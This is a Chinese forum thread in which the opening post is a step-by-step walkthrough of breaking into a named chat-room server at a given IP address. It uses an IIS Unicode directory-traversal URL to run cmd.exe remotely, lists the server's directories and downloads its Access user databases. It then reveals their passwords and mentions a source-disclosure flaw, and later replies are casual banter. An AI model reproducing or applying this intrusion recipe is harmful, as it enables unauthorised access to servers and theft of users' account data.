气死了，怎么才能学会啊！（聊天室攻破手迹）

★☆★

本人向来不去什么聊天室觉得简直就是浪费生命的表现，但偏偏有不少人喜欢去里面捣乱（我绝对是不支持的），但既然有人感兴趣就拿个地方给大家讲讲下不为例！！！就拿不少人喜欢的江湖来讲讲吧我去的是四川自贡分部-------

地址是http://61.139.44.69/xajh

首先用http://61.139.44.69/xajh/.ida可以看到它的物理路径,显示为：

找不到 IDQ 文件 C:\Inetpub\wwwroot\xajh\.ida

然后用http://61.139.44.69/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
可以看到它的C盘根目录为：
Directory of c:\

2000-10-12 15:58 0 -xquizit.nfo
2000-10-12 15:58 0 .zip
2000-10-12 15:59 0 001.mid
2000-10-12 15:56 0 07-艳阳天.mp3
2000-10-12 15:58 0 1-1-132684_4(1).jpg
2000-10-12 15:58 0 1.gif
2000-10-12 15:49 0 10.ram
2000-10-12 15:49 0 10.rm
2000-10-12 15:58 0 2.gif
2000-10-12 15:58 0 3.gif
2000-10-12 15:58 0 4.gif
2000-10-12 15:58 0 5.gif
2000-10-12 15:58 0 6.gif
2000-10-12 15:55 0 9901_01.htm
2000-10-12 15:50 0 9901_01.mp3
2000-10-12 15:55 0 9901_01.ram
2000-10-12 15:55 0 9901_01.rm
2000-10-12 15:55 0 9901_02.htm
2000-10-12 15:50 0 9901_02.mp3
2000-10-12 15:55 0 9901_02.ram
2000-10-12 15:55 0 9901_02.rm
2000-10-12 15:55 0 9901_03.htm
2000-10-12 15:50 0 9901_03.mp3
2000-10-12 15:55 0 9901_03.ram
2000-10-12 15:55 0 9901_03.rm
2000-10-12 15:55 0 9901_04.htm
2000-10-12 15:50 0 9901_04.mp3
2000-10-12 15:55 0 9901_04.ram
2000-10-12 15:55 0 9901_04.rm
2000-10-12 15:55 0 9901_05.htm
2000-10-12 15:50 0 9901_05.mp3
2000-10-12 15:55 0 9901_05.ram
2000-10-12 15:55 0 9901_05.rm

......实在太多了还有好多垃圾MP3 ：（

直接进去看我们要看的访问
http://61.139.44.69/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot\xajh\

显示为：

Directory of C:\Inetpub\wwwroot\xajh

2000-10-13 17:49 < DIR > .
2000-10-13 17:49 < DIR > ..
2000-10-12 16:33 < DIR > admin
2000-10-12 16:33 < DIR > bbs
2000-10-12 16:33 < DIR > chat
2000-10-12 16:33 < DIR > Commodity
2000-10-12 18:45 5,015 cuteftp.cnt
2000-10-12 18:46 130,748 cuteftp.hlp
2000-10-12 16:33 < DIR > face1
2000-10-12 16:33 < DIR > faction
2000-10-12 16:33 < DIR > flower
2000-10-12 16:33 < DIR > gamebak
2000-10-12 19:08 829 global.asa
2000-10-12 16:33 < DIR > images
2000-09-30 19:51 3,513 index.asp
2000-09-30 19:34 433 index.htm
2000-09-30 19:47 5,062 jh.asp
2000-09-19 18:58 488 login.asp
2000-08-30 21:49 1,324 Message.asp
2000-10-12 16:33 < DIR > midi
2000-09-18 21:47 1,850 modipass.htm
2000-09-06 19:07 97 music.asp
2000-09-23 11:56 82 online.asp
2000-09-22 12:29 2,133 register.htm
2000-09-25 14:07 2,107 s1.htm
2000-10-12 16:33 < DIR > serve
2000-09-01 22:22 431 style.css
2000-09-19 19:12 400 wupin.asp
2000-10-12 16:33 < DIR > yuelao
2000-10-13 17:15 1,001,472 zg11.mdb
2000-10-11 07:58 978,944 zg21.mdb
17 File(s) 2,134,928 bytes
14 Dir(s) 2,001,309,696 bytes free

看到zg11.mdb 和zg21.mdb没有那就是记录所有用户数据密码资料的数据库了！快用浏览器拿回来吧：）
http://61.139.44.69/xajh/zg11.mdb
http://61.139.44.69/xajh/zg21.mdb

现在我们已经成功一大半了，下载完毕打开的时候发现要密码 呵呵~ 麻烦还得自己破下幸好是Access97的马上就看到密码了是pass1和pass2 简单吧：）
现在他们那里所有注册用户的资料数据我们就全拿到了，不过高兴别太早其中密码项还是有加密处理的，至于怎么解嘛 当然不能说了 大家可以自己试试 总之非常简单就是了。还有他们的服务器2000NT有translate:f的漏洞可以轻松看到所有ASP原文件，省了你不少时间吧。

上面就是对一台2000NT服务器上的聊天室的简单破解，实际上是通过远程调用CMD进程来实现的，当然方法还有很多大家可以随便看看，如果你对这篇文章有什么不理解的地方或让我帮你破什么BBS 聊天室千万不要找我 毕竟本人还是主张不要聊天浪费生命的。

★龙神★

楼上的小PP扭得不错啊：）

★☆★

喜欢借你用几天！

水晶之光

上面的那位老兄，被打了还在笑，我真佩服。

★☆★

倒~叫你们来不是让你们看我的签名的！

天才天天

真是的！现在的技术问题真是太多了！

★☆★

就是，你也不会吧！

醉老

不过不要看太多，对身心不好的。

Remind：此消息由醉老在02-27　11:56:14做过手脚，呵呵……

★☆★

错别字太多，自己改吧！
就是不会才要学的嘛！

光环使者

[I]以下引用★龙神★的内容：
[/I]楼上的小PP扭得不错啊：）

呵呵